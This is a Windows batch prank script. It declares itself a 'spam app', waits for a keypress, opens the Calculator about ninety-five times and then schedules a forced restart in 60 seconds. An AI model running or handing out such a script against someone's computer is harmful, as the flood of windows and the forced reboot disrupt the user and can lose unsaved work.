@echo off
color 57
echo this is a spam app ok
pause
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
start calc.exe
shutdown /r /t 60
exit
